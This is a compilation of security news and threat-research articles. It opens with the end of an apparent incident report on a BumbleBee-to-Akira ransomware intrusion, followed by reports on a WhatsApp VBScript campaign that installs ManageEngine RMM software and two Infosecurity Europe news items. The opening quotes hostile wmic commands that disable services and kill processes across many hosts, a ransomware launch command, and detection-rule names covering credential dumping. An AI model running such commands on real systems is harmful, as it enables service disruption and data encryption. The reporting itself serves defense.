Disabling wmic /node:@C:\temp\hosts1.txt /failfast:on service where "Name Like '%sql%'" call ChangeStartmode Disabledwmic /node:@C:\temp\hosts1.txt /failfast:on service where "Name Like '%iis%'" call ChangeStartmode Disabled Process Termination wmic /node:@C:\temp1\hosts.txt /failfast:on process where "CommandLine Like '%sql%'" delete The ransomware payload, renamed as win.exe, was staged in the C:\ProgramData directory and executed with the following parameters: .\win.exe -n=2 netonly . The use of the -n=2 flag indicates a specific encryption threshold, while the netonly argument was likely used to focus the impact on network-accessible resources and shares. Timeline Diamond Model Indicators Atomic opmanager[.]pro download-center[.]online ev2sirbd269o5j[.]org - BumbleBee 2rxyt8yrhq0bgj[.]org - BumbleBee d1hmxkpwby0d4s[.]org - BumbleBee yj6jurm5qqkye5[.]org - BumbleBee ewujsfb1dp5ran[.]org - BumbleBee 8doj8uvx604eck[.]org - BumbleBee kwywztxoo2xdot[.]org - BumbleBee ky1d1p1daahe5t[.]org - BumbleBee ovh1kn1tcqw5kp[.]org - BumbleBee 6cimu4mc085em8[.]org - BumbleBee 5ka8rxp6t6eup2[.]org - BumbleBee ks501oz9nm3v05[.]org - BumbleBee v5rjsdqogstopr[.]org - BumbleBee 192.121.22.94 - BumbleBee 109.205.195.211 - BumbleBee 188.40.187.145 - BumbleBee 171.22.183.43 - BumbleBee 194.127.178.21 - BumbleBee 172.96.137.160 - AdaptixC2 193.242.184.150 - Reverse SSH Tunnel 185.174.100.203 - Exfil Server Computed ManageEngine-OpManager.msi 124a48b78060fa851e1cc077ca35713c ab82bf27132323861810c0efcac6d5dd01600dd4 186b26df63df3b7334043b47659cba4185c948629d857d47452cc1936f0aa5da msimg32.dll ca8646dfc88423bb9fffda811160cebe febbaf5f08a8e0782ffcce8beef1f2b4e249a52b a6df0b49a5ef9ffd6513bfe061fb60f6d2941a440038e2de8a7aeb1914945331 locker.exe 8c113b3aa82c81eee7c6b4ed0ba9a90f d66944e1a57daf04d3e809f22cd01946d593acaf de730d969854c3697fd0e0803826b4222f3a14efe47e4c60ed749fff6edce19d Detections Network 2056726 : ET MALWARE BumbleBee Loader CnC Checkin 2056727 : ET MALWARE BumbleBee Loader CnC Server Response 2027174 : ET INFO Command Shell Activity Over SMB - Possible Lateral Movement 2047702 : ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup 2047703 : ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI 2027267 : ET INFO Possible Lateral Movement - File Creation Request in Remote System32 Directory 2043343 : ET INFO RustDesk Domain in DNS Lookup 2044076 : ET INFO RustDesk Relay Domain in DNS Lookup 2025701 : ET INFO SMB2 NT Create AndX Request For an Executable File 2025703 : ET INFO SMB2 NT Create AndX Request For an Executable File In a Temp Directory 2027182 : ET INFO WMIC WMI Request Over SMB - Likely Lateral Movement 2027189 : ET NETBIOS DCERPC DCOM ExecuteShellCommand Call 2851485 : ETPRO INFO SMB/DCERPC Bind_ack with Big-Endian Assoc Group 2851484 : ETPRO INFO SMB/DCERPC Bind_ack with Endian Flipped Sigma Search rules on detection.fyi or sigmasearchengine.com 410f5c82-1fec-42d0-9552-7d9d885517b2 : Veeam Credential Dumping via PostgreSQL psql 637ab586-af22-4be2-9100-215952232f65 : DNS Zone Enumeration and Export via PowerShell e20f9b0e-b4af-40b7-8a9d-eaed7f61d4cd : LSASS Enumeration Followed by Memory Dump - Correlation Rule 9c4034f6-d413-49e1-b257-419775a14736 : Multiple DGA DNS Queries - Correlation Rule Sigma Repo: 646ea171-dded-4578-8a4d-65e9822892e3 : Process Memory Dump Via Comsvcs.DLL 4ac1f50b-3bd0-4968-902d-868b4647937e : DPAPI Domain Backup Key Extraction 87df9ee1-5416-453a-8a08-e8d4a51e9ce1 : Delete Volume Shadow Copies Via WMI With PowerShell 05a2ab7e-ce11-4b63-86db-ab32e763e11d : MMC Spawning Windows Shell fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c : PowerShell Base64 Encoded FromBase64String Cmdlet ca2092a1-c273-4878-9b4b-0d60115bf5ea : Suspicious Encoded PowerShell Command Line b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c : Suspicious PowerShell Encoded Command Patterns 8a582fe2-0882-4b89-a82a-da6b2dc32937 : Suspicious WmiPrvSE Child Process c7c8aa1c-5aff-408e-828b-998e3620b341 : MSI Installation From Suspicious Locations 2aa0a6b4-a865-495b-ab51-c28249537b75 : Startup Folder File Write 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 : Potentially Suspicious CMD Shell Output Redirect 178e615d-e666-498b-9630-9ed363038101 : Elevated System Shell Spawned From Uncommon Parent Location 61065c72-5d7d-44ef-bf41-6a36684b545f : Elevated System Shell Spawned 4f4eaa9f-5ad4-410c-a4be-bc6132b0175a : CMD Shell Output Redirect a24e5861-c6ca-4fde-a93c-ba9256feddf0 : Uncommon Process Access Rights For Target Image 241e802a-b65e-484f-88cd-c2dc10f9206d : Read Contents From Stdin Via Cmd.EXE d21374ff-f574-44a7-9998-4a8c8bf33d7d : WmiPrvSE Spawned A Process 502b42de-4306-40b4-9596-6f590c81f073 : Local Accounts Discovery e28a5a99-da44-436d-b7a0-2afc20a5f413 : Whoami Utility Execution bd8b828d-0dca-48e1-8a63-8a58ecf2644f : Group Membership Reconnaissance Via Whoami.EXE 0ef56343-059e-4cb6-adc1-4c3c967c5e46 : Suspicious Execution of Systeminfo 903076ff-f442-475a-b667-4f246bcc203b : Nltest.EXE Execution 5cc90652-4cbd-4241-aa3b-4b462fa5a248 : Potential Recon Activity Via Nltest.EXE 183e7ea8-ac4b-4c23-9aec-b3dac4e401ac : Net.EXE Execution d95de845-b83c-4a9a-8a6a-4fc802ebf6c0 : Suspicious Group And Account Reconnaissance Activity Using Net.EXE cd219ff3-fa99-45d4-8380-a7d15116c6dc : New User Created Via Net.EXE 8eef149c-bd26-49f2-9e5a-9b00e3af499b : Pass the Hash Activity 2 4d07b1f4-cb00-4470-b9f8-b0191d48ff52 : DNS Query To Remote Access Software Domain From Non-Browser App fb843269-508c-4b76-8b8d-88679db22ce7 : Suspicious Execution of Powershell with Base64 692f0bec-83ba-4d04-af7e-e884a96059b6 : Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell d0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6 : Unusually Long PowerShell CommandLine 42f595c8-7223-43b1-93d3-0349a851a535 : PowerShell Get-Process LSASS in ScriptBlock 5b768e71-86f2-4879-b448-81061cbae951 : Suspicious Manipulation Of Default Accounts Via Net.EXE YARA AdaptixC2_listener_beacon_http AdaptixC2_listener_beacon_http_var2 BumblebeeC2 CAPE_Bumblebee2024 DITEKSHEN_MALWARE_Win_Akira MALPEDIA_Win_Bumblebee_Auto Multi_Ransomware_Akira_21842eb3 SECUINFRA_SUSP_Powershell_Base64_Decode SIGNATURE_BASE_MAL_WIN_Akira_Apr25 SIGNATURE_BASE_SUSP_PS1_JAB_Pattern_Jun22_1 SUSP_PS1_JAB_Pattern_Jun22_1 Windows_Ransomware_Akira_c8c298ba Windows_Trojan_Adaptix_b2cda978 Windows_Trojan_Bumblebee_35f50bea win_bumblebee_auto MITRE ATT&CK Create Account - T1136 Credentials from Password Stores - T1555 Data Encrypted for Impact - T1486 Data from Network Shared Drive - T1039 Distributed Component Object Model - T1021.003 DLL - T1574.001 Domain Account - T1087.002 Domain Generation Algorithms - T1568.002 Domain Groups - T1069.002 Domain Trust Discovery - T1482 Drive-by Compromise - T1189 Exfiltration Over C2 Channel - T1041 Exfiltration Over Symmetric Encrypted Non-C2 Protocol - T1048.001 File and Directory Discovery - T1083 Inhibit System Recovery - T1490 Local Account - T1087.001 Local Groups - T1069.001 LSASS Memory - T1003.001 Malicious File - T1204.002 Masquerading - T1036 Network Service Discovery - T1046 Network Share Discovery - T1135 NTDS - T1003.003 PowerShell - T1059.001 Process Injection - T1055 Proxy - T1090 Remote Access Tools - T1219 Remote Desktop Protocol - T1021.001 Remote System Discovery - T1018 Service Execution - T1569.002 System Information Discovery - T1082 System Owner/User Discovery - T1033 Web Protocols - T1071.001 Windows Command Shell - T1059.003 Windows Management Instrumentation - T1047 Windows Service - T1543.003 File Deletion - T1070.004 Command Obfuscation - T1027.010 Internal case #TB36726 #PR40373
thedfirreport.comJun 29, 2026extracted
WhatsApp VBScript Campaign Uses Fake Documents to Install ManageEngine RMM Tool
Direct messages sent via WhatsApp are being used to distribute malicious Visual Basic Script (VBScript) files that lead to the installation of legitimate Remote Monitoring and Management (RMM) software. Per findings from Kaspersky, the active campaign is targeting users of WhatsApp Desktop and WhatsApp Web across Malaysia, Brazil, India, Mexico, Singapore, the U.K., Spain, Taiwan, Australia, Russia, and Vietnam. The highest concentration of victims has been reported in Malaysia. "The threat actor uses deceptive file names masquerading as business and financial documents to persuade recipients to download and execute the attachment," security researcher Fareed Radzi said. "Once executed, the VBScript initiates a multi-stage infection chain that ultimately results in the installation of legitimate Remote Monitoring and Management (RMM) software, enabling remote access to the victim's system." It's suspected that the threat actor behind the operation managed to obtain surreptitious access to several WhatsApp accounts and then used them as a distribution vector for the VBScript files across their contacts. That said, exactly how these accounts are compromised is unclear. The heavily obfuscated VBScript files are dressed up as seemingly harmless business and financial documents, using names like "Financial Reports.vbs" or "Account Statement.vbs." Some of the files are also named in other languages, such as Portuguese, French, German, and Malay, reflective of the global nature of the campaign. "In addition, the VBScript samples contain extensive comments and metadata intended to mimic legitimate Microsoft Windows Update components," Kaspersky explained. "Many of these comments are written in Chinese and include references to Windows Update modules, certificate validation, system integrity checks, and deployment-related functionality." The VBScript file is launched using "WScript.exe," which then fetches and runs additional VBScript components required for the next stages of the attack. It's worth noting that the infection chain behaves a little differently based on whether a victim is using WhatsApp Web or the WhatsApp Desktop application. In the case of the former, the attack relies on the user downloading the file to their system and then opening it from the downloaded folder or via the browser's download history, assuming it to be a legitimate document. In WhatsApp Desktop, the malware is executed directly within the application, with the process tree revealing that "WhatsApp.Root.exe," the background process associated with the client application, is responsible for spawning "WScript.exe." The primary objective of the VBScript is to download two secondary VBScript payloads from a remote server, one of which attempts to tamper with Windows User Account Control (UAC) behavior, while the other downloads and executes a ZIP file containing the installation package for ManageEngine RMM Central. The activity remains unattributed, however, the Russian cybersecurity company said it found infrastructure overlaps ("202.61.160[.]201") with prior activity linked to Gh0st RAT and ValleyRAT. "Users should be cautious when receiving unexpected attachments through WhatsApp, even when they appear to originate from known contacts," Kaspersky said. "Script and executable file types such as VBS, VBE, EXE, BAT, CMD, JS, and PS1 should not be opened unless their legitimacy has been independently verified."
thehackernews.comJun 23, 2026extracted
WhatsApp phishing attack uses fake business docs to hack PCs
An ongoing malware campaign is targeting WhatsApp users in multiple countries with deceptive messages that push VBScript files, leading to remote system access. The threat actor is using file names that indicate business and financial documents delivered by the victim's contacts, whose accounts had been compromised. By downloading and executing the malicious attachments, the recipient starts an infection chain that leads to installing the legitimate ManageEngine Endpoint Central, which is used by IT administrators to manage systems from a centralized dashboard. Telemetry data from cybersecurity company Kaspersky shows that the campaign spreads across Brazil, India, Mexico, Singapore, the UK, Spain, Taiwan, Australia, Russia, Vietnam, and Malaysia. Attack chain Kaspersky reports that the attacks begin with messages sent from compromised accounts that contain nothing but a heavily obfuscated VBS file. These files are given names that make them appear to be financial reports, billing statements, account notices, and similar documents likely to draw the target’s attention and prompt them to open the file. The filenames are also localized in multiple languages, further confirming the campaign’s global reach. “Based on evidence collected from multiple victims through social media reports and submitted samples, we can conclude that the threat actor had gained access to several WhatsApp accounts and used them to distribute the malicious VBScript files to contacts on the compromised users’ contact lists,” Kaspersky explains. “At the time of writing, the exact method used to compromise these WhatsApp accounts remains unknown.” If the victim downloads and opens the file on Windows, the VBScript fetches two additional scripts from the attacker's infrastructure, which, in turn, disable UAC protections through Registry modifications and download a ZIP archive containing the ManageEngine Endpoint Central program. The software is silently installed in the background and configured to connect to attacker-controlled management servers, giving them remote administration access on the victim’s computer. Kaspersky notes that when the initial VBScript file is delivered via WhatsApp Web, it must be downloaded, but when opened in the WhatsApp Desktop client, it can be executed directly via Windows Script Host (wscript.exe). While Kaspersky does not attribute the attacks to a specific threat actor, the researchers found signs of Chinese language use and infrastructure overlap with IPs previously associated with ValleyRAT and Gh0st RAT activity. However, there is insufficient evidence for high-confidence attribution to be possible. WhatsApp users are advised to treat files sent by contacts, even trusted ones, with caution and to always verify them through secondary means. All downloaded files should be scanned with an up-to-date antivirus before executing them. Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comJun 22, 2026extracted
A VBScript campaign distributed through WhatsApp deploying RMM software
In June 2026, we observed a malware campaign distributing malicious VBScript files through direct messages in WhatsApp. The campaign affected users across multiple countries and territories, including Malaysia, Brazil, India, Mexico, Singapore, UK, Spain, Taiwan, Australia, Russia and Vietnam, with the highest number of victims observed in Malaysia. At the time of writing this article, the campaign is still active. Analysis shows that the campaign primarily targets users of WhatsApp Desktop and WhatsApp Web. The threat actor uses deceptive file names masquerading as business and financial documents to persuade recipients to download and execute the attachment. Once executed, the VBScript initiates a multi-stage infection chain that ultimately results in the installation of legitimate Remote Monitoring and Management (RMM) software, enabling remote access to the victim’s system. We came across a number of social media posts reporting that the malware was being distributed by the users’ contacts. The messages contained only the malicious attachment and did not include any accompanying text. One account sent the same attachment to multiple contacts from their list. Based on evidence collected from multiple victims through social media reports and submitted samples, we can conclude that the threat actor had gained access to several WhatsApp accounts and used them to distribute the malicious VBScript files to contacts on the compromised users’ contact lists. At the time of writing, the exact method used to compromise these WhatsApp accounts remains unknown. Social engineering through financial-themed file names Analysis of the samples revealed that the threat actor relied heavily on social engineering through the use of deceptive file names designed to appear as legitimate business and financial documents. The file names frequently referenced invoices, account statements, debt notices, payment records, and bank statements. Examples of file names include: Financial Reports.vbs Debt confirmation.vbs Statement of Debt(30K).vbs Outstanding Payment List.vbs Account Statement.vbs Debt Statement.vbs Billing Statement (2).vbs Promissory_Note(b).vbs Several file names were also localized into different languages, including Portuguese, French, German, and Malay. Examples include: Extrato de Conciliação.vbs Aviso de dívida.vbs Le formulaire de demande le plus récent.vbs Bitte füllen Sie das Formular für Umsatzsteuer-Nullsatz-Verkäufe aus.vbs Penyata bank.vbs Sila semak bil anda.vbs The use of multiple languages further suggests that the campaign may be targeting victims across different geographic regions. In addition, the VBScript samples contain extensive comments and metadata intended to mimic legitimate Microsoft Windows Update components. Many of these comments are written in Chinese and include references to Windows Update modules, certificate validation, system integrity checks, and deployment-related functionality. The screenshot below shows an example of the Windows Update–themed comments and Chinese-language annotations embedded within one of the analyzed scripts. Delivery of the initial VBScript file Analysis of telemetry collected from the systems where the malware was executed, conducted together with the dynamic analysis of the sample, showed that the VBScript is launched through Windows Script Host (WScript.exe), which subsequently retrieves and executes additional VBScript components required for the later stages of the attack. Two user interactions are needed to initiate the infection chain. When the user first clicks the attachment in either WhatsApp Desktop or WhatsApp web, it is downloaded to their machine. To launch the app, they need to open it. In WhatsApp Desktop, the malware is executed directly within the application by clicking the file icon after downloading it or by choosing the “Open” option in the chat. The process tree analysis shows that WScript.exe is spawned by WhatsApp.Root.exe. The executed script was observed within WhatsApp Desktop’s attachment storage directory, with the following command line: This process relationship confirms that the malicious VBScript was executed directly from the WhatsApp Desktop client. In contrast, when the attachment is accessed through WhatsApp Web, to launch the malware, the user should open the downloaded file from the Downloads folder or through the browser’s download history. In the first case, the malware’s parent process will be explorer.exe, while in the second, it will be executed by the browser where the web app was opened. Technical analysis Stage 1: Initial VBScript execution The first stage of the infection chain is a VBS or VBE file delivered through WhatsApp. Although multiple variants of the scripts were observed, their core functionality remains consistent: the script creates a working directory under C:\Users\Public\Documents\, downloads two additional VBScript payloads from a remote infrastructure, and executes them using Windows Script Host. Across the observed variants, the working directory is created using randomized names such as Temp_ or MSUpdate_ . Some variants also configure the directory and downloaded files with hidden and system attributes, likely to reduce visibility to the user during execution. The scripts employ several obfuscation techniques, including string concatenation, encoded VBScript, randomized variable names, and large amounts of junk content. One notable variant employs even heavier obfuscation than the other samples. The script reconstructs object names, file paths, utilities, and URLs through character-by-character string concatenation. Several variants copy curl.exe and bitsadmin.exe into the working directory and rename them using DLL-like filenames before downloading additional VBS files. The downloaded files are commonly staged using misleading file extensions before execution. For example, some variants download files using PDF or TXT extensions and then change them to VBS before launching them with wscript.exe. Other variants download the secondary VBScript payloads directly. Despite differences in infrastructure, file names, and obfuscation methods, all observed variants ultimately perform the same function: downloading and executing two secondary VBScript payloads that continue the infection chain. Stage 2: Execution of secondary VBScript payloads Following execution, the Stage 1 VBScript downloads and launches two additional VBScript files from attacker-controlled infrastructure. One script attempts to modify Windows User Account Control (UAC) settings, while the other downloads and executes a ZIP archive containing the installation package for a RMM software. VBS script 1: UAC configuration modification First Stage 2 scripts were observed attempting to modify Windows UAC behavior. As shown in the figure above, the script repeatedly executes an elevated registry modification command targeting the following registry key: The command is launched using the ShellExecute method with the runas verb, causing Windows to request administrative privileges before the registry change can be applied. Its goal is to set the ConsentPromptBehaviorAdmin registry key value to 0, thus enabling administrative actions without displaying a consent prompt to the user. The script attempts to apply this registry change in a loop with short delays between executions, likely to increase the chances that the setting will be successfully modified if administrative privileges are granted by the victim. VBS script 2: ZIP download and script execution The second VBS script downloads a ZIP file, extracts it and executes a script to start the RMM installation. Similar to the Stage 1 downloader, the Stage 2 downloader creates its own working directory under C:\Users\Public\Documents\, commonly using randomized folder names such as Sys , Data , or a random numeric value. In most cases, the hidden attribute is assigned to this folder. The script then downloads a ZIP archive from attacker-controlled infrastructure, extracts its contents, and executes an embedded setup1.vbs script. Similar to the Stage 1 downloader, the variants leverage multiple download mechanisms, including curl, bitsadmin, certutil, PowerShell, and direct HTTP requests. Following a successful download, the archive is extracted using the Shell.Application COM interface. Most variants invoke the CopyHere method with flags intended to suppress user prompts and allow extraction to proceed without user interaction. The extracted setup1.vbs script is then launched through wscript.exe to proceed with the next stage of the infection chain. Also, one variant additionally attempts to remove Zone.Identifier alternate data streams from extracted files prior to execution, likely to reduce security warnings associated with files downloaded from the Internet. Stage 3: Installation of remote monitoring and management software Besides the setup1.vbs script, the ZIP archive downloaded during Stage 2 contains a preconfigured ManageEngine Endpoint Central deployment package. Inside the archive are the files required to install and register the Endpoint Central agent, including the MSI installer, configuration files, certificates, and installation scripts. The table below summarizes the purpose of each file contained within the deployment package: ManageEngine Endpoint Central is a legitimate enterprise management platform commonly used for software deployment, system administration, and remote support. Its remote administration capabilities make it attractive for abuse by threat actors seeking persistent access to compromised systems. One interesting variant attempted to disguise the package as an income tax–related document. Instead of containing a legitimate tax document, the archive contained a VBScript file named “Income Tax Return Form.vbs” and accompanied by an instruction file designed to persuade the victim to open it. Analysis showed that the VBScript contained functionality similar to setup1.vbs, ultimately performing the same Endpoint Central installation process. As discussed in Stage 2, the downloader ultimately executes a VBScript file named setup1.vbs. The script first verifies that the required installation files are present in the extracted folder and then attempts to relaunch itself with administrative privileges using the Windows runas mechanism before proceeding with the installation. Once elevated, setup1.vbs silently installs the bundled ManageEngine Endpoint Central agent using msiexec.exe, applying the supplied configuration and certificate files. The installation is performed silently, preventing the user from seeing the Endpoint Central installation interface. Analysis of the embedded DCAgentServerInfo.json configuration file revealed the following Endpoint Central management servers: 202.61.160[.]208 202.61.160[.]202 202.61.160[.]201 202.61.160[.]160 202.61.160[.]137 38.55.151[.]63 Notably, 202.61.160[.]201 had previously been observed as command-and-control infrastructure associated with ValleyRAT and Gh0st RAT activity. Although the overlap raises the possibility of the VBS campaign being linked to the operator of these known malware families, the available evidence is insufficient to confidently attribute the campaign to a known threat actor. Victimology and attribution Based on our telemetry, infections were observed across several countries and territories, including Malaysia, Brazil, India, Mexico, Singapore, UK, Spain, Taiwan, Australia, Russia, and Vietnam, with 80% of the victims located in Malaysia. The campaign primarily relied on malicious VBScript attachments distributed through WhatsApp and appeared to target individual users rather than specific organizations or industries. At the time of the analysis, no evidence suggested a focused targeting strategy, instead indicating a broad, opportunistic campaign aimed at consumers. We were unable to confidently attribute this activity to a known threat actor or intrusion set. However, several artifacts observed throughout the campaign point to a possible Chinese-speaking threat actor. Multiple VBScript samples contained comments, module descriptions, and execution notes written in simplified Chinese characters. These comments appeared consistently across different variants, suggesting that the scripts were likely developed or maintained by a Chinese-speaking operator. We also identified infrastructure overlaps with IP addresses previously associated with ValleyRAT and Gh0st RAT activity. While these overlaps may indicate infrastructure reuse or shared hosting resources, they are not sufficient to establish a direct connection to any known threat actor. Based on the available evidence, we assess with low confidence that the campaign was conducted by a Chinese-speaking operator. Additional investigation, infrastructure overlaps, or operational indicators would be required to support a stronger attribution assessment. Conclusion This campaign uses compromised WhatsApp accounts to distribute malicious VBScript attachments that ultimately install a preconfigured ManageEngine Endpoint Central agent on victim systems. Observed victims were located across multiple countries and territories, including Malaysia, Brazil, India, Mexico, Singapore, UK, Spain, Taiwan, Australia, Russia, and Vietnam, suggesting a broad and opportunistic campaign. Users should be cautious when receiving unexpected attachments through WhatsApp, even when they appear to originate from known contacts. Script and executable file types such as VBS, VBE, EXE, BAT, CMD, JS, and PS1 should not be opened unless their legitimacy has been independently verified. IOCs VBScript c7f38cbb99c8b74fa0465293feeba700 Financial Reports.vbs b7cd06c71465038b658a6dc1f273a507 Debt confirmation.vbs 9f13c7b8ba391b2f597874e54d310648 Electronic statement(A).vbs 993f4c0cadbc769a4b0ed62a918db58d Financial Reports(s).vbs 7f81c1bc8cfd588e8998968e2621456e Outstanding Payment List.vbs 7403cbcc5a9c32384d431856dc48fcc9 Statement of debt (4).vbs 68c16c46f8afb9e00bbaba0207fb0a46 Debt Note (2).vbs 66442f2457eca8f47385b1fb2c6fcab8 Statement of Debt(30K).vbs 6359e6236471cbe434d0ef4c42b7f879 Applicationform1.vbs 5b6bbcc06cf08cc99e1afeda486d42fb Extrato de Conciliação.vbs 5002eca748205d544618e3bd2dedc223 Statement of Debt(29K).vbs 4f0593e8e0e8fac49429e9b45ebf7fa1 Outstanding Payment List.vbs 4044e4b6471c9de7b0a4ba37d9d9df9a billing statement (2).vbs 20209b3a32769afc6a75694b8d8839dd Statement of Debt(A).vbs 0ba93109757776a44de9d8c88baa4963 Financial Reports(C1).vbs 02bb20455cc592a69c080abac770ce90 Le formulaire de demande le plus récent .vbs 6c39900d77dcba158e1d27c7619cb06d Outstanding Balance Sheet(A).vbs dad708e050632a4280cabf98ac1376b7 Outstanding Balance Sheet.vbs 05d188f071d097f5b6bd8138749b4b14 Penyata bank.vbs 2c6f05f1f309d89b2236e6c8b59c88f9 Account Statement(13K) (2).vbs 3b1aba44dd3d9b6339b6f56e2f42034b Statement of Account.txt d43fdaa1f0ee09d7e5f0f94ee9df7b6c Bitte füllen Sie das Formular für Umsatzsteuer-Nullsatz-Verkäufe aus.vbs df4fa0369eaca5cec348be293890d4af Account Statement.vbs 63ac85195b73753333316a889cf5880f Statement of Account(O).vbs 74fd9f91fc93b6288b4fc253ea5b3e20 Sila semak bil anda.vbs d06333c360b51456f427e616c3c5f8bd Sila semak bil anda.vbs 993f4c0cadbc769a4b0ed62a918db58d FinancialReportsS.vbs 1d94fbe9cab21278cc3f104bea334d08 Promissory_Note(b).vbs 9d9ac85765e4a818a3ccabe2cf4fef82 Debt Statement.vbs 6fb6a55424adfb61e31f06aef33273e5 dfjieya.vbs f90ed4b2d0b67114aa89ddfed658e5c0 dfjieya.vbs 8c3322009b8982663c0cbecd9492e7eb 0lf.vbs 66705384a7ad81d14c34fc6c054a0ecf iowepv.vbs 8c6d9fc389ad3f20ccbc71d77eb39bfa btksfmsi.vbs 1a3cc75466ffb1971482f7abf7aabc3f home3.vbs 1c47c63e5ed25060d95359c57c77b107 zipats.vbs 31037a42ca048e06e69a78f55bc2eff5 1122.vbs 7f16449cd0c4862d1eadf8a5742bf09a payload_1.vbs 79ecd61b09b0f2d54b34586c916c4ec9 sac8.vbs 7849061c536a3efb05a56d504694e7e7 6oy.vbs ddaffe9849f7f3c79f8804adb9a6b3d5 kof.vbs d01cad98dd0d01b75e04e784953c5e2b sleestak_payload_1.vbs
securelist.comJun 22, 2026extracted
Infosecurity Europe: NCSC Urges Immediate Action to Boost Resilience as Uncertainty Persists
Security teams must improve collaboration and enhance cyber resilience if they are to survive in an increasingly volatile world, one of the UK’s leading cybersecurity agencies has warned. Speaking at Infosecurity Europe on June 2, National Cyber Security Centre (NCSC) director of operations, Paul Chichester, shared his vision of the threat landscape, and what organizations must do to manage risk at a time of tremendous change. Despite having observed the “arc of cybersecurity” for over three decades, Chichester admitted “now is perhaps the first time I’m not sure ‘where next?’.” That’s down to a confluence of technological change, geopolitical uncertainty, and threat landscape evolution. “It feels like there are a lot of dice and a lot of variables and we’re not predicting anything very well these days,” he admitted. “Professionally, things are harder than they’ve ever been.” Chichester’s words came as new data released by ManageEngine revealed that 77% of British organizations suffered a cyber incident over the past year, 11% above the European average. The Lay of the Threat Landscape Chichester described several other areas of concern which infosecurity professionals will be familiar with, but need to address. They included hyper connectivity – which he claimed was growing at such a rate that it’s increasingly difficult for defenders to track and manage across the entire IT estate. Another is the pace of tech transformation, which Chichester said will drive huge “societal and civilizational changes” and create yet more “vast amounts of uncertainty.” “It’s quite a lonely place to be as a technology and security professional because we’re trying to slow things down,” he added. “As technologists, that’s not what we want.” Chichester warned of the growing use of cyber as a tool for “overt and covert statecraft” – ranging from the kind of hybrid warfare Russia is waging in Ukraine, to the transnational repression Beijing turns on certain parts of its diaspora. Compounding these challenges is the fact that corporate IT is getting more complex, said Chichester. Codebases might have a lifespan of just weeks or months and apps rewrite themselves – with AI disrupting everything. “How many people really understand their entire tech stack from apps down to the hardware?” he asked the audience. “That’s hard. That uncertainty is something we’ll have to try and manage.” Fighting Back Together Chichester also had some words of optimism for attendees. There is a growing acceptance in government of using offensive techniques to “confer costs on our adversaries,” he explained. He also had warm words for the upcoming Cyber Security and Resilience Bill (CSRB). “We’re really pleased about where the bill is ending up,” he said. “We’re optimistic we’re setting some really powerful standards.” However, public-private sector collaboration will be key going forward. “Government can only do so much. It’s a collective endeavor,” said Chichester. “I really mean it this time. Now more than ever is the time to act. We have to work together.” Time to Act, Says NCSC Although threats are morphing and growing by the day, there remain some basic best practices that will help network defenders, he explained. These include: Reducing the attack surface: “It’s hard to use a frontier AI model [as an adversary] if you can’t get to the platform,” said Chichester Addressing legacy systems and shadow IT: This is where frontier AI can help by “democratizing” high-performance pen testing and red teaming for all organizations Access controls: Including zero trust approaches and access management. “Identity is the root of everything going forward,” said Chichester Prepare for incidents before they occur: Incident response exercises are particularly important, and could “transform” an organization’s response posture, especially at board level, said Chichester “Uncertainty can be massively disabling and make you wait for certainty,” Chichester concluded. “But now is the time to be acting. You need to get match fit. We will be living in a completely different world as defenders. Don’t wait for certainty, because it’s never coming."
infosecurity-magazine.comJun 2, 2026extracted
Infosecurity Europe: UK Firms Prioritize AI Threat Preparedness as Cyber Risks Evolve
As AI-powered cyber-attacks are a top risk for UK cybersecurity professionals, investment priorities over the next 12 to 24 months is set to focus on AI and advanced threat preparedness. This according to new findings from ManageEngine which surveyed 1500 IT and business decision-makers across the UK, Spain, Germany, Italy and the Netherlands. The firm found that 43% of UK respondents identified AI-powered attacks as their single biggest risk over the next 12 months, ahead of traditional threats such as ransomware, phishing and data breaches. The top spending commitment cited by 41% of UK respondents is set to focus on tackling AI and advanced threats. ManageEngine said AI-powered attacks are the top predicted risk in Germany and Spain also, with investment priorities aligned accordingly across all five countries surveyed. Cyber Incidents Surge as Skills Gap Widens The research also found that more than three quarters (77%) of UK businesses have suffered a cyber incident in the past year. This was 11 points higher than the rest of the European nations surveyed. In the UK, 46% of respondents cited a skills gap driven by rapidly evolving threats as their primary operational challenge. Over nine percentage points higher than other European nations surveyed. VimalRaj Sampathkumar, technical head, UKI, ManageEngine, said, “UK organizations are facing one of the most challenging cyber threat environments in Europe, with attacks growing in both volume and sophistication.” However, he noted that the findings also show businesses are responding proactively, investing in resilience, strengthening governance and prioritising preparedness for AI-driven threats. Firms in the UK reported the highest levels of formal review processes, backup strategies and resilience framework adoption of any country surveyed, with 67.9% implementing a formal resilience methodology. “The focus now must be on turning that investment into operational readiness through better visibility, stronger skills, and more integrated resilience strategies,” Sampathkumar. Team fatigue and burnout was cited as a key challenge by 29% of UK respondents, the highest rate in Europe, alongside insufficient management support, also at 29%. Both figures are above the European averages of 21%. Finally, the company found that UK organizations lead in executive cybersecurity engagement, yet board involvement remains largely reactive. One in five reported limited or no engagement, while only a third describe leadership as consistently proactive. Post-incident responses reveal similar caution: although most conduct reviews and implement fixes, 13% make no strategic changes and just 37% pursue long-term improvements. The research also highlights a widening gap between detection and recovery. While 94% of incidents are identified within 24 hours, recovery often lags, with over a quarter taking more than 10 days and some exceeding 20, underscoring persistent resilience challenges despite strong detection capabilities.
infosecurity-magazine.comJun 2, 2026extracted
⚡ Weekly Recap: Linux Flaws, Defender 0-Days, Router Botnets, and Supply Chain Chaos
